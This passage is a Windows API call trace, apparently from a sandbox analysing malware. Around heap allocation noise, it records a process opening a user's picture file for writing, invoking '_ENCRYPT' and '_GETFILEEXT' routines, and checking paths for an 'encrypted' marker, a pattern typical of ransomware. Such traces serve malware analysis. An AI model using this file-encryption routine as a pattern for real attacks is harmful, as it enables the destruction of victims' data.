(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.155] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.156] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\en4vtzxy-xqnxdkqmy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.156] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.157] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.157] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.157] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.157] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.157] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.158] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.158] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.158] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.158] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.158] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.158] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.158] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.158] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.158] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.158] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b4e0, ftCreationTime.dwHighDateTime=0x1d5b652, ftLastAccessTime.dwLowDateTime=0x33d385b0, ftLastAccessTime.dwHighDateTime=0x1d5b798, ftLastWriteTime.dwLowDateTime=0x33d385b0, ftLastWriteTime.dwHighDateTime=0x1d5b798, nFileSizeHigh=0x0, nFileSizeLow=0x138c5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="EN4vTZXy-xQnxDkqMy.gif", cAlternateFileName="EN4VTZ~1.GIF")) returned 0x7c20c0 [0040.159] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.159] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.159] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b4e0, ftCreationTime.dwHighDateTime=0x1d5b652, ftLastAccessTime.dwLowDateTime=0x33d385b0, ftLastAccessTime.dwHighDateTime=0x1d5b798, ftLastWriteTime.dwLowDateTime=0x33d385b0, ftLastWriteTime.dwHighDateTime=0x1d5b798, nFileSizeHigh=0x0, nFileSizeLow=0x138c5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="EN4vTZXy-xQnxDkqMy.gif", cAlternateFileName="EN4VTZ~1.GIF")) returned 0x7c20c0 [0040.159] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.159] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 